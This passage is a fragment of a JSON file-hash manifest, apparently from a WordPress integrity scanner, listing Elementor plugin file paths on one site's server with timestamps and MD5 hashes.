-content\\/plugins\\/elementor\\/includes\\/controls\\/number.php\":{\"d\":1545638473,\"h\":\"d617f02f14761e380ea40f4bc676cc8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/base-ui.php\":{\"d\":1545638473,\"h\":\"f1df46c94c52af7bb7b018c8922183cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/tab.php\":{\"d\":1545638473,\"h\":\"be410f1a1f0e0549f67b4686e13b4511\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/raw-html.php\":{\"d\":1545638473,\"h\":\"56c718288f68877403c1a728edd71cb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/select2.php\":{\"d\":1545638473,\"h\":\"a8cf232cae9de55bacd51af971355c14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/button.php\":{\"d\":1545638473,\"h\":\"fb7ce4ea59cce070e8d84d86f9e6d493\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/text-shadow.php\":{\"d\":1545638473,\"h\":\"04086d619cfaf0c153f8fcec664c9759\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/base-data.php\":{\"d\":1545638473,\"h\":\"dcc1d677823136332120025329878497\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/hidden.php\":{\"d\":1545638473,\"h\":\"10c17aaeae3f5572fe062e62e57fe709\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/base.php\":{\"d\":1545638473,\"h\":\"74aa978176c3ef745878de35b09ca7f8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/media.php\":{\"d\":1545638473,\"h\":\"e08b860ebe86c0538d4b9066920911aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/controls\\/code.php\":{\"d\":1545638473,\"h\":\"b3405623dc045a5d037f0c313d4c3111\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/schemes\\/typography.php\":{\"d\":1545638473,\"h\":\"1df8a6ae87bb677ae3bcdcc215c11471\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/schemes\\/color.php\":{\"d\":1545638473,\"h\":\"a64f73e8e3d038cbb8fb85986520d7fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/schemes\\/color-picker.php\":{\"d\":1545638473,\"h\":\"02ec57791b32c7f567ccf85b8327fd5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/schemes\\/base.php\":{\"d\":1545638473,\"h\":\"cf2940dd5c60738bbfa1bc8d97802549\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/icon-box.php\":{\"d\":1545638473,\"h\":\"c63273769c906309635f9a879e480d34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/social-icons.php\":{\"d\":1545638473,\"h\":\"26e4b7e3aef0eef6d2dffaab75f40684\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/accordion.php\":{\"d\":1545638473,\"h\":\"803a4fe61823dcbb22ab437c908fca2b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/divider.php\":{\"d\":1545638473,\"h\":\"b78c236f5c6863a599fe17738682414b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/html.php\":{\"d\":1545638473,\"h\":\"1c36a6e8359cb540e483b1990d66518a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/star-rating.php\":{\"d\":1545638473,\"h\":\"349a1a8aa1b16e09289ac265b30fdf14\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/video.php\":{\"d\":1545638473,\"h\":\"c71ffd7200bb218a47b9439c2ba54a05\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/shortcode.php\":{\"d\":1545638473,\"h\":\"b3b7465fdd6f79a16dd0018896e2e752\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/icon.php\":{\"d\":1545638473,\"h\":\"359ebf6f89850f774b3c624d82d1c7f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/image-carousel.php\":{\"d\":1545638473,\"h\":\"2a666f5f84ffd4b1aa74d1711b1bb394\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/image-box.php\":{\"d\":1545638473,\"h\":\"b76027303465378c01e95dab02717111\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/wordpress.php\":{\"d\":1545638473,\"h\":\"f2866574f37104b30ad694cdc3686144\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/menu-anchor.php\":{\"d\":1545638473,\"h\":\"541ec6d87a9021d6b3030806e2901d36\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/icon-list.php\":{\"d\":1545638473,\"h\":\"8967783dfad38a9b052f0bf63e9bdd7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/heading.php\":{\"d\":1545638473,\"h\":\"e4aa1a06d148c558431d2bf85a31b385\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/google-maps.php\":{\"d\":1545638477,\"h\":\"d20e22826fab60580767c4475d0b2c22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/text-editor.php\":{\"d\":1545638477,\"h\":\"ad5499ac2f1994ca6bb6dc8e515de7fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/tabs.php\":{\"d\":1545638477,\"h\":\"415dec0d36f798ba146cfc92f4cc7f61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/sidebar.php\":{\"d\":1545638477,\"h\":\"9d83476a0024d5554e27813808c7b66e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/alert.php\":{\"d\":1545638477,\"h\":\"00ab36b378f332b982678812dddc0fc8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/button.php\":{\"d\":1545638477,\"h\":\"4bcc86b8148f77ccccf2ea6db4eddebf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/audio.php\":{\"d\":1545638477,\"h\":\"0499c8eefbe3576a595a28b2a7a8bf66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/testimonial.php\":{\"d\":1545638477,\"h\":\"a04d67bcfc509a9c08a0d68bb5e9759f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/toggle.php\":{\"d\":1545638477,\"h\":\"6b2b2639fc63cf3f502e754763f79c2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/image.php\":{\"d\":1545638477,\"h\":\"e1e3b414b3b6da0ec72390e22a83e5d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/image-gallery.php\":{\"d\":1545638477,\"h\":\"bf8b04f47941339123e0624af55026ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/common.php\":{\"d\":1545638477,\"h\":\"851640d2340b9320e567b2c05ab23916\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/counter.php\":{\"d\":1545638477,\"h\":\"ec86826bbba341632002f2287a61a52c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/spacer.php\":{\"d\":1545638477,\"h\":\"bc7c37752ac4f42692d61b44dcc19cb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/widgets\\/progress.php\":{\"d\":1545638477,\"h\":\"ecbb01aa75046063d452400722703eda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/libraries\\/bfi-thumb\\/bfi-thumb.php\":{\"d\":1545638477,\"h\":\"d39534d4a8e2e27c3016c18a1be8f2d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/interfaces\\/group-control.php\":{\"d\":1545638477,\"h\":\"9da0a7cad97e6994bd53e84221565a03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/interfaces\\/scheme.php\":{\"d\":1545638477,\"h\":\"d29ece3d09b822a394f4e28ccb0cdac2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/elements\\/repeater.php\":{\"d\":1545638477,\"h\":\"d11a1a627ee479f9443702e649484af1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/elements\\/section.php\":{\"d\":1545638477,\"h\":\"3d9d170a6f318388ee6095413c964e9b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/elements\\/column.php\":{\"d\":1545638477,\"h\":\"be77733c0f7c7ac778847db3b496f6c6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/base\\/controls-stack.php\":{\"d\":1545638477,\"h\":\"2adf30d87dd12cef54bceacd03b359b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/base\\/widget-base.php\":{\"d\":1545638477,\"h\":\"24e364554a2e19096707be4e75dd89c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/base\\/skin-base.php\":{\"d\":1545638477,\"h\":\"b314c3ed012fc5596fff0b48d6741684\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/base\\/element-base.php\":{\"d\":1545638477,\"h\":\"883af584cdcffd4ac81c19db6f57ef31\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/template-library\\/classes\\/class-import-images.php\":{\"d\":1545638477,\"h\":\"d143fd87e6d5e4a16fdd896078d0db9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/template-library\\/sources\\/remote.php\":{\"d\":1545638477,\"h\":\"177f4a85400c99facfc8bbcad11fe013\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/template-library\\/sources\\/local.php\":{\"d\":1545638477,\"h\":\"d750d4d3ac32a89117c4e15c999b8283\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/template-library\\/sources\\/base.php\":{\"d\":1545638477,\"h\":\"419098245432cf60a699efb1d407340b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/template-library\\/manager.php\":{\"d\":1545638477,\"h\":\"005298086ef5c506c1e88f7fce51cc27\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/admin-templates\\/new-template.php\":{\"d\":1545638477,\"h\":\"bba740102131b7f51c891e92a3ad3220\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/abstracts\\/base-reporter.php\":{\"d\":1545638477,\"h\":\"f5d8c3255ce15423da450007283dbcff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/wordpress.php\":{\"d\":1545638477,\"h\":\"8cd865e606e88863137e7889f507ad72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/server.php\":{\"d\":1545638477,\"h\":\"27c8474d66729919069d15e87205f1ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/plugins.php\":{\"d\":1545638477,\"h\":\"19eec808e7560c7f3f52e218bae698c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/mu-plugins.php\":{\"d\":1545638477,\"h\":\"43e759a79da815638bb038d873225769\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/user.php\":{\"d\":1545638477,\"h\":\"efa75095ebcf03c5843711ab05b9fe90\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/theme.php\":{\"d\":1545638477,\"h\":\"32351805ac0a7d0b298b469e70bc9b09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/classes\\/network-plugins.php\":{\"d\":1545638477,\"h\":\"2e42ed6105ed82a3e08d836cdd431c50\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/helpers\\/model-helper.php\":{\"d\":1545638477,\"h\":\"590ab9a2f8d5658326b8662cc1311992\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/templates\\/html.php\":{\"d\":1545638477,\"h\":\"54a6030ac0584176faf65c85d5d5d15f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/templates\\/raw.php\":{\"d\":1545638477,\"h\":\"f6a93da45783f2aedab99d26397342a0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/system-info\\/main.php\":{\"d\":1545638477,\"h\":\"ab01336876942826d60f84bcb02d8bde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/settings-page.php\":{\"d\":1545638477,\"h\":\"1f8f66c40ecad41fd2caea8392e89640\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/controls.php\":{\"d\":1545638477,\"h\":\"f0ba62d4f221c1bb703dd32ad89d0cda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/tools.php\":{\"d\":1545638477,\"h\":\"6fb32941ac02f709d101f1ab9b76765a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/validations.php\":{\"d\":1545638477,\"h\":\"267a336f11b813a9d8934d34d4a1f5f1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/settings\\/settings.php\":{\"d\":1545638477,\"h\":\"d05d0cf44a4e7c15bbf73b53e53fc28d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/panel.php\":{\"d\":1545638477,\"h\":\"5fe0674cfc14cc2ea188a12443c06b5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/repeater.php\":{\"d\":1545638477,\"h\":\"28b5f00a8a13658fce6c593bf31cf199\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/navigator.php\":{\"d\":1545638477,\"h\":\"e5678f4464712bac031b438a0ebfae2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/library-layout.php\":{\"d\":1545638477,\"h\":\"9cad3723c784e6c2520b6da2203630cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/hotkeys.php\":{\"d\":1545638477,\"h\":\"f49c75c4ee19bf228215b8241c59be6b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/global.php\":{\"d\":1545638477,\"h\":\"9d6cb28a3c46e5d20bc50e655e50d9f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/templates.php\":{\"d\":1545638477,\"h\":\"39080e29c1cb477340189bb50c708fb3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/editor-wrapper.php\":{\"d\":1545638477,\"h\":\"660ade2892f0717844382ceb4cbf4d74\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor-templates\\/panel-elements.php\":{\"d\":1545638477,\"h\":\"9d539c0e92b6240cd37a0a3869fb25ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/debug\\/debug-reporter.php\":{\"d\":1545638477,\"h\":\"5f148d303084ffe8dd51b5f8c2f83df4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/debug\\/debug.php\":{\"d\":1545638477,\"h\":\"8258fb26e1f8c541cfdf7cd47cc50e3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/plugin.php\":{\"d\":1545638473,\"h\":\"332aaa401b8ac55460362ccc75daf01f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/api.php\":{\"d\":1545638473,\"h\":\"a094ef9ac668729c6aed3abc0a8f4deb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/utils.php\":{\"d\":1545638473,\"h\":\"f13510c651bde70b7feeb09f1e28dac6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/stylesheet.php\":{\"d\":1545638473,\"h\":\"c6aefd969df8570becb8c7f138085d40\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/rollback.php\":{\"d\":1545638473,\"h\":\"f2642cbe3ff8a2e0bce42870c0492ffa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/heartbeat.php\":{\"d\":1545638473,\"h\":\"8843c0240c0f8a55469a0775e5e06eeb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/db.php\":{\"d\":1545638477,\"h\":\"6b9f25e8499890a1497a19e9609949e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/upgrades.php\":{\"d\":1545638477,\"h\":\"06caf5d8674e32666cfd891122d8a72a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/preview.php\":{\"d\":1545638477,\"h\":\"43b5e1c6200a262c37f7d76dcf19a34b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/frontend.php\":{\"d\":1545638477,\"h\":\"ce6ef1fef68c990cbc9bbb63ce86eead\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/shapes.php\":{\"d\":1545638477,\"h\":\"9e469a3c8a392c5a000019cd759e05e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/compatibility.php\":{\"d\":1545638477,\"h\":\"f84208325d8028a8e70ff0dafa89fd48\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/beta-testers.php\":{\"d\":1545638477,\"h\":\"12d9637cd6af58f75cfcc55d4a22f330\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/user.php\":{\"d\":1545638477,\"h\":\"a8dfe32e603ac5001f746736959135c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/editor.php\":{\"d\":1545638477,\"h\":\"1af2f401fda8cb08838a47e514dc061c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/tracker.php\":{\"d\":1545638477,\"h\":\"30858a3f76701a6e4d776d0da4fa77ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/maintenance-mode.php\":{\"d\":1545638477,\"h\":\"12ff165a224364e15b52bf1fdb8f5960\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/conditions.php\":{\"d\":1545638477,\"h\":\"4da1648faee218c9824c85e77ea75fdb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/autoloader.php\":{\"d\":1545638477,\"h\":\"1df30e7657587de5b6ced1b21a345a4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/embed.php\":{\"d\":1545638477,\"h\":\"91b4f52512047eac528b64a308a876b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/maintenance.php\":{\"d\":1545638477,\"h\":\"6f6228320e66b219b11a533d9edf744b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/includes\\/fonts.php\":{\"d\":1545638477,\"h\":\"d39ce77899e57834c9fd3e4012496828\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/dynamic-tags\\/module.php\":{\"d\":1545638477,\"h\":\"5d8fd34b94adf434dd839cf9168250ae\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/gutenberg\\/module.php\":{\"d\":1545638477,\"h\":\"b618372e459f281091ff401a7f14884f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/library\\/documents\\/section.php\":{\"d\":1545638477,\"h\":\"86a71a22a64f9c3279dd1c5fc0839a22\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/library\\/documents\\/not-supported.php\":{\"d\":1545638477,\"h\":\"8033aade8d4b170b70df7413b3259896\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/library\\/documents\\/library-document.php\":{\"d\":1545638477,\"h\":\"0c07e26f88f7559bdcdded8744d88efa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/library\\/documents\\/page.php\":{\"d\":1545638477,\"h\":\"4a090b8f5278d36831fa6810424bac1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/library\\/module.php\":{\"d\":1545638477,\"h\":\"e5f24f9d02ce00abe00795a6d262db2d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/history\\/views\\/revisions-panel-template.php\":{\"d\":1545638477,\"h\":\"6cb8bf6ca050b8677946668e8a78d801\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/history\\/views\\/history-panel-template.php\":{\"d\":1545638477,\"h\":\"f385ff88d4f72761f83b8d7964765749\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/history\\/revisions-manager.php\":{\"d\":1545638477,\"h\":\"4c34ecf668632c8f8071337476f14d7f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/history\\/module.php\":{\"d\":1545638477,\"h\":\"b46391449f389cc7bba251f8fd02ae1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/wp-cli\\/command.php\":{\"d\":1545638477,\"h\":\"1bfc94fbc6ac0d4e955f58b8fcdf3417\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/wp-cli\\/module.php\":{\"d\":1545638477,\"h\":\"151850ab01d7e377e356b7ddb2c2bcb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/page-templates\\/templates\\/canvas.php\":{\"d\":1545638477,\"h\":\"4c351931f0893942bda31d9a2baf6e16\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/page-templates\\/templates\\/header-footer.php\":{\"d\":1545638477,\"h\":\"8efed3f5085e248a11b84e30d983969d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/modules\\/page-templates\\/module.php\":{\"d\":1545638477,\"h\":\"69f1b7bae63a54b510d256127d36d905\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/dynamic-tags\\/manager.php\":{\"d\":1545638477,\"h\":\"ef7794cc2fac0e12b6ced30d831261fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/dynamic-tags\\/base-tag.php\":{\"d\":1545638477,\"h\":\"2a3b5ad5e2c62cb25a982c056d81c94a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/dynamic-tags\\/dynamic-css.php\":{\"d\":1545638477,\"h\":\"26542a5ee1ec8999ae3af9534b690dd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/dynamic-tags\\/data-tag.php\":{\"d\":1545638477,\"h\":\"8421ad6c8761650cbb4e8750d7357bce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/dynamic-tags\\/tag.php\":{\"d\":1545638477,\"h\":\"8385c34e199d46d138033a4ee52f4cfc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/elementor\\/core\\/responsive\\/files\\/frontend.php\":{\"d\":1545638477,\"h\":\"accb730581bbc25c92dee12096080d64\"},\"\\/